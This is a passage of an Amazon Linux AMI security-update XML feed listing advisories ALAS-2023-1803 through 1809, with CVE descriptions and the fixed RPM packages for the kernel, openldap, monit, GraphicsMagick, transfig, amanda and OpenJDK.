epoch="0" arch="i686"><filename>Packages/openssh-keycat-7.4p1-22.80.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="22.80.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-7.4p1-22.80.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1803</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1803: medium priority package update for kernel</title><issued date="2023-08-17 11:39:00" /><updated date="2023-08-23 02:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4128:
A use-after-free flaw was found in net/sched/cls_fw.c in classifiers (cls_fw, cls_u32, and cls_route) in the Linux Kernel. This flaw allows a local attacker to perform a local privilege escalation due to incorrect handling of the existing filter, leading to a kernel information leak issue.
CVE-2023-34319:
A buffer overrun vulnerability was found in the netback driver in Xen due to an unusual split packet. This flaw allows an unprivileged guest to cause a denial of service (DoS) of the host by sending network packets to the backend, causing the backend to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34319" title="" id="CVE-2023-34319" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4128" title="" id="CVE-2023-4128" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.322-170.535.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1804</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1804: medium priority package update for openldap</title><issued date="2023-08-17 11:39:00" /><updated date="2023-08-23 02:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-2953:
A vulnerability was found in openldap that can cause a null pointer dereference in the ber_memalloc_x() function.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2953" title="" id="CVE-2023-2953" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openldap-debuginfo" version="2.4.40" release="16.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-debuginfo-2.4.40-16.37.amzn1.x86_64.rpm</filename></package><package name="openldap-clients" version="2.4.40" release="16.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-clients-2.4.40-16.37.amzn1.x86_64.rpm</filename></package><package name="openldap-devel" version="2.4.40" release="16.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-devel-2.4.40-16.37.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.40" release="16.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-sql-2.4.40-16.37.amzn1.x86_64.rpm</filename></package><package name="openldap-servers" version="2.4.40" release="16.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-2.4.40-16.37.amzn1.x86_64.rpm</filename></package><package name="openldap" version="2.4.40" release="16.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-2.4.40-16.37.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.40" release="16.37.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-sql-2.4.40-16.37.amzn1.i686.rpm</filename></package><package name="openldap-devel" version="2.4.40" release="16.37.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-devel-2.4.40-16.37.amzn1.i686.rpm</filename></package><package name="openldap-debuginfo" version="2.4.40" release="16.37.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-debuginfo-2.4.40-16.37.amzn1.i686.rpm</filename></package><package name="openldap" version="2.4.40" release="16.37.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-2.4.40-16.37.amzn1.i686.rpm</filename></package><package name="openldap-clients" version="2.4.40" release="16.37.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-clients-2.4.40-16.37.amzn1.i686.rpm</filename></package><package name="openldap-servers" version="2.4.40" release="16.37.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-2.4.40-16.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1805</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1805: important priority package update for monit</title><issued date="2023-08-17 11:39:00" /><updated date="2023-08-23 02:31:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-26563:
An issue was discovered in Tildeslash Monit before 5.31.0, allows remote attackers to gain escilated privlidges due to improper PAM-authorization.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26563" title="" id="CVE-2022-26563" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="monit-debuginfo" version="5.2.5" release="3.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/monit-debuginfo-5.2.5-3.12.amzn1.x86_64.rpm</filename></package><package name="monit" version="5.2.5" release="3.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/monit-5.2.5-3.12.amzn1.x86_64.rpm</filename></package><package name="monit" version="5.2.5" release="3.12.amzn1" epoch="0" arch="i686"><filename>Packages/monit-5.2.5-3.12.amzn1.i686.rpm</filename></package><package name="monit-debuginfo" version="5.2.5" release="3.12.amzn1" epoch="0" arch="i686"><filename>Packages/monit-debuginfo-5.2.5-3.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1806</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1806: important priority package update for GraphicsMagick</title><issued date="2023-08-17 11:39:00" /><updated date="2024-02-14 20:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-1270:
In GraphicsMagick, a heap buffer overflow was found when parsing MIFF.
CVE-2020-21679:
Buffer Overflow vulnerability in WritePCXImage function in pcx.c in GraphicsMagick 1.4 allows remote attackers to cause a denial of service via converting of crafted image file to pcx format.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21679" title="" id="CVE-2020-21679" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1270" title="" id="CVE-2022-1270" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick" version="1.3.38" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-1.3.38-1.1.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-doc" version="1.3.38" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.38-1.1.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.38" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.38-1.1.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.38" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.38-1.1.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.38" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.38-1.1.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.38" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.38-1.1.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.38" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.38-1.1.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.38" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.38-1.1.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.38" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.38-1.1.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.38" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.38-1.1.amzn1.i686.rpm</filename></package><package name="GraphicsMagick" version="1.3.38" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-1.3.38-1.1.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.38" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.38-1.1.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.38" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.38-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1807</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1807: medium priority package update for transfig</title><issued date="2023-08-17 11:39:00" /><updated date="2024-06-07 05:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-32280:
An issue was discovered in fig2dev before 3.2.8.. A NULL pointer dereference exists in the function compute_closed_spline() located in trans_spline.c. It allows an attacker to cause Denial of Service. The fixed version of fig2dev is 3.2.8.
CVE-2020-21684:
A global buffer overflow in the put_font in genpict2e.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into pict2e format.
CVE-2020-21683:
A global buffer overflow in the shade_or_tint_name_after_declare_color in genpstricks.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into pstricks format.
CVE-2020-21682:
A global buffer overflow in the set_fill component in genge.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into ge format.
CVE-2020-21681:
A global buffer overflow in the set_color component in genge.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into ge format.
CVE-2020-21678:
A global buffer overflow in the genmp_writefontmacro_latex component in genmp.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into mp format.
CVE-2019-19797:
An out-of-bounds write flaw was found in transfig in the way the `fig2dev` program handled the processing of Fig format files. Specifically, the flaw affects the translation process of Fig codes into the box graphics language. This flaw allows for potential exploitation by crashing the `fig2dev` program by tricking it into processing specially crafted Fig format files.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19797" title="" id="CVE-2019-19797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21678" title="" id="CVE-2020-21678" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21681" title="" id="CVE-2020-21681" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21682" title="" id="CVE-2020-21682" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21683" title="" id="CVE-2020-21683" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21684" title="" id="CVE-2020-21684" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32280" title="" id="CVE-2021-32280" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="transfig" version="3.2.7b" release="10.8.amzn1" epoch="1" arch="x86_64"><filename>Packages/transfig-3.2.7b-10.8.amzn1.x86_64.rpm</filename></package><package name="transfig-debuginfo" version="3.2.7b" release="10.8.amzn1" epoch="1" arch="x86_64"><filename>Packages/transfig-debuginfo-3.2.7b-10.8.amzn1.x86_64.rpm</filename></package><package name="transfig" version="3.2.7b" release="10.8.amzn1" epoch="1" arch="i686"><filename>Packages/transfig-3.2.7b-10.8.amzn1.i686.rpm</filename></package><package name="transfig-debuginfo" version="3.2.7b" release="10.8.amzn1" epoch="1" arch="i686"><filename>Packages/transfig-debuginfo-3.2.7b-10.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1808</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1808: medium priority package update for amanda</title><issued date="2023-08-17 11:39:00" /><updated date="2023-08-23 02:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-30577:
AMANDA (Advanced Maryland Automatic Network Disk Archiver) before tag-community-3.5.4 mishandles argument checking for runtar.c, a different vulnerability than CVE-2022-37705.
CVE-2016-10729:
An issue was discovered in Amanda 3.3.1. A user with backup privileges can trivially compromise a client installation. The "runtar" setuid root binary does not check for additional arguments supplied after --create, allowing users to manipulate commands and perform command injection as root.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10729" title="" id="CVE-2016-10729" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30577" title="" id="CVE-2023-30577" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="amanda-server" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/amanda-server-2.6.1p2-8.14.amzn1.x86_64.rpm</filename></package><package name="amanda-client" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/amanda-client-2.6.1p2-8.14.amzn1.x86_64.rpm</filename></package><package name="amanda-devel" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/amanda-devel-2.6.1p2-8.14.amzn1.x86_64.rpm</filename></package><package name="amanda-debuginfo" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/amanda-debuginfo-2.6.1p2-8.14.amzn1.x86_64.rpm</filename></package><package name="amanda" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/amanda-2.6.1p2-8.14.amzn1.x86_64.rpm</filename></package><package name="amanda-debuginfo" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="i686"><filename>Packages/amanda-debuginfo-2.6.1p2-8.14.amzn1.i686.rpm</filename></package><package name="amanda-client" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="i686"><filename>Packages/amanda-client-2.6.1p2-8.14.amzn1.i686.rpm</filename></package><package name="amanda-devel" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="i686"><filename>Packages/amanda-devel-2.6.1p2-8.14.amzn1.i686.rpm</filename></package><package name="amanda" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="i686"><filename>Packages/amanda-2.6.1p2-8.14.amzn1.i686.rpm</filename></package><package name="amanda-server" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="i686"><filename>Packages/amanda-server-2.6.1p2-8.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1809</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1809: important priority package update for java-1.8.0-openjdk</title><issued date="2023-08-21 12:14:00" /><updated date="2023-08-23 02:31:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-2830:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Concurrency). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2020-2805:
A flaw was found in the way the readObject() method of the MethodType class in the Libraries component of OpenJDK checked argument types. This flaw allows an untrusted Java application or applet to bypass Java sandbox restrictions.
CVE-2020-2803:
A flaw was found in the boundary checks in the java.nio buffer classes in the Libraries component of OpenJDK, where it is bypassed in certain cases. This flaw allows an untrusted Java application or applet o bypass Java sandbox restrictions.
CVE-2020-2800:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Lightweight HTTP Server). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).
CVE-2020-2781:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2020-2773:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Security). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2020-2757:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2020-2756:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2020-2755:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Scripting). Supported versions that are affected are Java SE: 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2020-2754:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Scripting). Supported versions that are affected are Java SE: 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2754" title="" id="CVE-2020-2754" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2755" title="" id="CVE-2020-2755" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2756" title="" id="CVE-2020-2756" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2757" title="" id="CVE-2020-2757" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2773" title="" id="CVE-2020-2773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2781" title="" id="CVE-2020-2781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2800" title="" id="CVE-2020-2800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2803" title="" id="CVE-2020-2803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2805" title="" id="CVE-2020-2805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2830" title="" id="CVE-2020-2830" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-demo" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.252.b09-2.51.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.252.b09-2.51.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.252.b09-2.51.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.252.b09-2.51.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.252.b09-2.51.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.252.b09-2.51.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.252.b09-2.51.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.252.b09-2.51.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.252.b09-2.51.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.252.b09-2.51.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.252.b09-2.51.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.252.b09" release="2.51.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.252.b09-2.51.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.252.b09" 